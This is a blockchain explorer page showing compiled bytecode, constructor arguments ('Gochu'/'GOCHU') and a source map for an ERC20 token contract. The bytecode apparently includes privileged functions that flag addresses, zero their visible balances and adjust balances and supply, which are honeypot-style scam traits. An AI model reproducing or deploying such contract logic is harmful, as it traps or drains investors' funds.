00019811461082e578181101561081f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103ad565b61082e84846106578585610e37565b50505050565b60006108408484610aca565b90506001600160a01b0384166108a65760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ad565b6001600160a01b0383166109085760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ad565b818110156109675760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103ad565b6001600160a01b03841660009081526008602052604090205461098b908390610e37565b6001600160a01b0380861660009081526008602052604080822093909355908516815220546109bb908390610e4a565b6001600160a01b0380851660008181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610a0f9086815260200190565b60405180910390a361082e83610b49565b6000546001600160a01b031633146105685760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ad565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038083166000908152600860209081526040808320549385168352600990915281205490919060ff168015610b1457506003546001600160a01b03858116911614155b15610b1d575060005b6001600160a01b0384166000908152600a602052604090205460ff1615610b42575060005b9392505050565b6001600160a01b03811660009081526006602052604090205460ff16610bcf576001600160a01b0381166000818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b600060208083528351808285015260005b81811015610bff57858101830151858201604001528201610be3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c3757600080fd5b919050565b60008060408385031215610c4f57600080fd5b610c5883610c20565b946020939093013593505050565b600060208284031215610c7857600080fd5b5035919050565b600080600060608486031215610c9457600080fd5b610c9d84610c20565b9250610cab60208501610c20565b9150604084013590509250925092565b60008060408385031215610cce57600080fd5b610cd783610c20565b915060208301358015158114610cec57600080fd5b809150509250929050565b600060208284031215610d0957600080fd5b610b4282610c20565b6020808252825182820181905260009190848201906040850190845b81811015610d535783516001600160a01b031683529284019291840191600101610d2e565b50909695505050505050565b60008060408385031215610d7257600080fd5b610d7b83610c20565b9150610d8960208401610c20565b90509250929050565b600181811c90821680610da657607f821691505b602082108103610dc657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761032657610326610dcc565b600082610e1657634e487b7160e01b600052601260045260246000fd5b500490565b602080825260029082015261667560f01b604082015260600190565b8181038181111561032657610326610dcc565b8082018082111561032657610326610dcc56fea264697066735822122071a9f0864d7d22ff90d1b6f66bebbd4334c9f3829f80d92d01dfd3d47b7c2d7e64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005476f6368750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005474f434855000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Gochu
Arg [1] : symbol_ (string): GOCHU

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [3] : 476f636875000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 474f434855000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

4083:10110:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7172:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8937:152;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;8937:152:0;1004:187:1;13214:566:0;;;;;;:::i;:::-;;:::i;:::-;;5965:91;6036:12;;5965:91;;;1527:25:1;;;1515:2;1500:18;5965:91:0;1381:177:1;9674:287:0;;;;;;:::i;:::-;;:::i;6064:83::-;;;6138:1;2038:36:1;;2026:2;2011:18;6064:83:0;1896:184:1;7774:187:0;;;;;;:::i;:::-;;:::i;4348:25::-;;;;;;:::i;:::-;;:::i;:::-;;;-1:-1:-1;;;;;2601:32:1;;;2583:51;;2571:2;2556:18;4348:25:0;2437:203:1;6780:152:0;;;;;;:::i;:::-;;:::i;6940:109::-;;;;;;:::i;:::-;-1:-1:-1;;;;;7024:17:0;6997:7;7024:17;;;:8;:17;;;;;;;6940:109;1722:103;;;:::i;6344:100::-;;;:::i;:::-;;;;;;;:::i;994:87::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;994:87;;5222:93;;;:::i;13792:398::-;;;;;;:::i;:::-;;:::i;8176:144::-;;;;;;:::i;:::-;;:::i;8331:134::-;;;;;;:::i;:::-;;:::i;7172:88::-;7209:13;7242:10;7235:17;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7172:88;:::o;8937:152::-;9003:4;9020:39;832:10;9043:7;9052:6;9020:8;:39::i;:::-;-1:-1:-1;9077:4:0;8937:152;;;;;:::o;13214:566::-;13331:12;;13354:5;;832:10;;13331:12;-1:-1:-1;;;;;13354:5:0;:21;;13350:427;;-1:-1:-1;;;;;13411:21:0;;13388:20;13411:21;;;:8;:21;;;;;;13440:3;;13411:26;;13435:2;13411:26;:::i;:::-;:32;;;;:::i;:::-;-1:-1:-1;;;;;13463:21:0;;13487:1;13463:21;;;:8;:21;;;;;;13388:55;;-1:-1:-1;13455:40:0;;;;-1:-1:-1;;;13455:40:0;;;;;;;:::i;:::-;;;;;;;;;-1:-1:-1;;;;;13506:21:0;;;;;;:8;:21;;;;;:37;;13531:12;;13506:21;:37;;13531:12;;13506:37;:::i;:::-;;;;;;;;13571:12;13555;;:28;;;;;;;:::i;:::-;;;;-1:-1:-1;13350:427:0;;-1:-1:-1;;13350:427:0;;13609:18;13637:6;13630:4;;:13;;;;:::i;:::-;-1:-1:-1;;;;;13656:21:0;;;;;;:8;:21;;;;;:35;;13609:34;;-1:-1:-1;13609:34:0;;13656:21;;;:35;;13609:34;;13656:35;:::i;:::-;;;;-1:-1:-1;13704:25:0;;-1:-1:-1;13719:10:0;13704:25;;:::i;:::-;13742:12;:26;;;13704:25;-1:-1:-1;;13350:427:0;13261:519;;13214:566;:::o;9674:287::-;9797:4;832:10;9855:38;9871:4;832:10;9886:6;9855:15;:38::i;:::-;9904:27;9914:4;9920:2;9924:6;9904:9;:27::i;:::-;-1:-1:-1;9949:4:0;;9674:287;-1:-1:-1;;;;9674:287:0:o;7774:187::-;7843:5;;-1:-1:-1;;;;;7843:5:0;832:10;7843:21;7840:64;;7880:12;;-1:-1:-1;;;7880:12:0;;;;;;;:::i;7840:64::-;-1:-1:-1;;;;;7917:19:0;;;;;;;;:12;:19;;;;;:36;;-1:-1:-1;;7917:36:0;;;;;;;;;;7774:187::o;4348:25::-;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;4348:25:0;;-1:-1:-1;4348:25:0;:::o;6780:152::-;6839:5;;-1:-1:-1;;;;;6839:5:0;6848:10;6839:19;6835:56;;6871:12;;-1:-1:-1;;;6871:12:0;;;;;;;:::i;6835:56::-;-1:-1:-1;;;;;6901:15:0;;;;;;;;:10;:15;;;;;:27;;-1:-1:-1;;6901:27:0;;;;;;;;;;6780:152::o;1722:103::-;713:13;:11;:13::i;:::-;1787:30:::1;1814:1;1787:18;:30::i;:::-;1722:103::o:0;6344:100::-;6392:16;6428:8;6421:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6421:15:0;;;;;;;;;;;;;;;;;;;;;;6344:100;:::o;5222:93::-;5262:13;5295:12;5288:19;;;;;:::i;13792:398::-;13885:4;832:10;13885:4;13968:25;832:10;13985:7;13968:9;:25::i;:::-;13941:52;;14032:15;14012:16;:35;;14004:85;;;;-1:-1:-1;;;14004:85:0;;5471:2:1;14004:85:0;;;5453:21:1;5510:2;5490:18;;;5483:30;5549:34;5529:18;;;5522:62;-1:-1:-1;;;5600:18:1;;;5593:35;5645:19;;14004:85:0;5269:401:1;14004:85:0;14100:60;14109:5;14116:7;14125:34;14144:15;14125:16;:34;:::i;:::-;14100:8;:60::i;8176:144::-;8238:4;8255:35;832:10;8279:2;8283:6;8255:9;:35::i;8331:134::-;-1:-1:-1;;;;;8430:18:0;;;8403:7;8430:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;8331:134::o;11373:378::-;-1:-1:-1;;;;;11509:19:0;;11501:68;;;;-1:-1:-1;;;11501:68:0;;5877:2:1;11501:68:0;;;5859:21:1;5916:2;5896:18;;;5889:30;5955:34;5935:18;;;5928:62;-1:-1:-1;;;6006:18:1;;;5999:34;6050:19;;11501:68:0;5675:400:1;11501:68:0;-1:-1:-1;;;;;11588:21:0;;11580:68;;;;-1:-1:-1;;;11580:68:0;;6282:2:1;11580:68:0;;;6264:21:1;6321:2;6301:18;;;6294:30;6360:34;6340:18;;;6333:62;-1:-1:-1;;;6411:18:1;;;6404:32;6453:19;;11580:68:0;6080:398:1;11580:68:0;-1:-1:-1;;;;;11659:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;11711:32;;1527:25:1;;;11711:32:0;;1500:18:1;11711:32:0;;;;;;;11373:378;;;:::o;12043:409::-;12178:24;12205:25;12215:5;12222:7;12205:9;:25::i;:::-;12178:52;;-1:-1:-1;;12245:16:0;:37;12241:204;;12327:6;12307:16;:26;;12299:68;;;;-1:-1:-1;;;12299:68:0;;6685:2:1;12299:68:0;;;6667:21:1;6724:2;6704:18;;;6697:30;6763:31;6743:18;;;6736:59;6812:18;;12299:68:0;6483:353:1;12299:68:0;12382:51;12391:5;12398:7;12407:25;12426:6;12407:16;:25;:::i;12382:51::-;12167:285;12043:409;;;:::o;10381:561::-;10492:21;10516;10528:4;10534:2;10516:11;:21::i;:::-;10492:45;-1:-1:-1;;;;;;10553:18:0;;10545:68;;;;-1:-1:-1;;;10545:68:0;;7043:2:1;10545:68:0;;;7025:21:1;7082:2;7062:18;;;7055:30;7121:34;7101:18;;;7094:62;-1:-1:-1;;;7172:18:1;;;7165:35;7217:19;;10545:68:0;6841:401:1;10545:68:0;-1:-1:-1;;;;;10629:16:0;;10621:64;;;;-1:-1:-1;;;10621:64:0;;7449:2:1;10621:64:0;;;7431:21:1;7488:2;7468:18;;;7461:30;7527:34;7507:18;;;7500:62;-1:-1:-1;;;7578:18:1;;;7571:33;7621:19;;10621:64:0;7247:399:1;10621:64:0;10718:6;10701:13;:23;;10693:74;;;;-1:-1:-1;;;10693:74:0;;7853:2:1;10693:74:0;;;7835:21:1;7892:2;7872:18;;;7865:30;7931:34;7911:18;;;7904:62;-1:-1:-1;;;7982:18:1;;;7975:36;8028:19;;10693:74:0;7651:402:1;10693:74:0;-1:-1:-1;;;;;10792:14:0;;;;;;:8;:14;;;;;;:21;;10807:6;;10792:21;:::i;:::-;-1:-1:-1;;;;;10775:14:0;;;;;;;:8;:14;;;;;;:38;;;;10836:12;;;;;;;:19;;10849:6;;10836:19;:::i;:::-;-1:-1:-1;;;;;10821:12:0;;;;;;;:8;:12;;;;;;;:34;;;;10874:26;;;;;;;;;;10893:6;1527:25:1;;1515:2;1500:18;;1381:177;10874:26:0;;;;;;;;10909:19;10925:2;10909:15;:19::i;1434:132::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;832:10;1498:23;1490:68;;;;-1:-1:-1;;;1490:68:0;;8260:2:1;1490:68:0;;;8242:21:1;;;8279:18;;;8272:30;8338:34;8318:18;;;8311:62;8390:18;;1490:68:0;8058:356:1;1987:191:0;2061:16;2080:6;;-1:-1:-1;;;;;2097:17:0;;;-1:-1:-1;;;;;;2097:17:0;;;;;;2130:40;;2080:6;;;;;;;2130:40;;2061:16;2130:40;2050:128;1987:191;:::o;6452:319::-;-1:-1:-1;;;;;6557:14:0;;;6522:7;6557:14;;;:8;:14;;;;;;;;;6583;;;;;:10;:14;;;;;;6522:7;;6557:14;6583;;:31;;;;-1:-1:-1;6609:5:0;;-1:-1:-1;;;;;6601:13:0;;;6609:5;;6601:13;;6583:31;6579:87;;;-1:-1:-1;6638:19:0;6579:87;-1:-1:-1;;;;;6676:18:0;;;;;;:12;:18;;;;;;;;6672:74;;;-1:-1:-1;6718:19:0;6672:74;6759:8;6452:319;-1:-1:-1;;;6452:319:0:o;6153:183::-;-1:-1:-1;;;;;6221:17:0;;;;;;:7;:17;;;;;;;;6216:113;;-1:-1:-1;;;;;6255:17:0;;;;;;:7;:17;;;;;:24;;-1:-1:-1;;6255:24:0;6275:4;6255:24;;;;;;6294:8;:23;;;;;;;;;;;;;;-1:-1:-1;;;;;;6294:23:0;;;;;;6216:113;6153:183;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:180::-;1255:6;1308:2;1296:9;1287:7;1283:23;1279:32;1276:52;;;1324:1;1321;1314:12;1276:52;-1:-1:-1;1347:23:1;;1196:180;-1:-1:-1;1196:180:1:o;1563:328::-;1640:6;1648;1656;1709:2;1697:9;1688:7;1684:23;1680:32;1677:52;;;1725:1;1722;1715:12;1677:52;1748:29;1767:9;1748:29;:::i;:::-;1738:39;;1796:38;1830:2;1819:9;1815:18;1796:38;:::i;:::-;1786:48;;1881:2;1870:9;1866:18;1853:32;1843:42;;1563:328;;;;;:::o;2085:347::-;2150:6;2158;2211:2;2199:9;2190:7;2186:23;2182:32;2179:52;;;2227:1;2224;2217:12;2179:52;2250:29;2269:9;2250:29;:::i;:::-;2240:39;;2329:2;2318:9;2314:18;2301:32;2376:5;2369:13;2362:21;2355:5;2352:32;2342:60;;2398:1;2395;2388:12;2342:60;2421:5;2411:15;;;2085:347;;;;;:::o;2645:186::-;2704:6;2757:2;2745:9;2736:7;2732:23;2728:32;2725:52;;;2773:1;2770;2763:12;2725:52;2796:29;2815:9;2796:29;:::i;2836:658::-;3007:2;3059:21;;;3129:13;;3032:18;;;3151:22;;;2978:4;;3007:2;3230:15;;;;3204:2;3189:18;;;2978:4;3273:195;3287:6;3284:1;3281:13;3273:195;;;3352:13;;-1:-1:-1;;;;;3348:39:1;3336:52;;3443:15;;;;3408:12;;;;3384:1;3302:9;3273:195;;;-1:-1:-1;3485:3:1;;2836:658;-1:-1:-1;;;;;;2836:658:1:o;3499:260::-;3567:6;3575;3628:2;3616:9;3607:7;3603:23;3599:32;3596:52;;;3644:1;3641;3634:12;3596:52;3667:29;3686:9;3667:29;:::i;:::-;3657:39;;3715:38;3749:2;3738:9;3734:18;3715:38;:::i;:::-;3705:48;;3499:260;;;;;:::o;3764:380::-;3843:1;3839:12;;;;3886;;;3907:61;;3961:4;3953:6;3949:17;3939:27;;3907:61;4014:2;4006:6;4003:14;3983:18;3980:38;3977:161;;4060:10;4055:3;4051:20;4048:1;4041:31;4095:4;4092:1;4085:15;4123:4;4120:1;4113:15;3977:161;;3764:380;;;:::o;4149:127::-;4210:10;4205:3;4201:20;4198:1;4191:31;4241:4;4238:1;4231:15;4265:4;4262:1;4255:15;4281:168;4354:9;;;4385;;4402:15;;;4396:22;;4382:37;4372:71;;4423:18;;:::i;4454:217::-;4494:1;4520;4510:132;;4564:10;4559:3;4555:20;4552:1;4545:31;4599:4;4596:1;4589:15;4627:4;4624:1;4617:15;4510:132;-1:-1:-1;4656:9:1;;4454:217::o;4676:325::-;4878:2;4860:21;;;4917:1;4897:18;;;4890:29;-1:-1:-1;;;4950:2:1;4935:18;;4928:32;4992:2;4977:18;;4676:325::o;5006:128::-;5073:9;;;5094:11;;;5091:37;;;5108:18;;:::i;5139:125::-;5204:9;;;5225:10;;;5222:36;;;5238:18;;:::i

Swarm Source

ipfs://71a9f0864d7d22ff90d1b6f66bebbd4334c9f3829f80d92d01dfd3d47b7c2d7e

Block Transaction Gas Used Reward
view all blocks produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.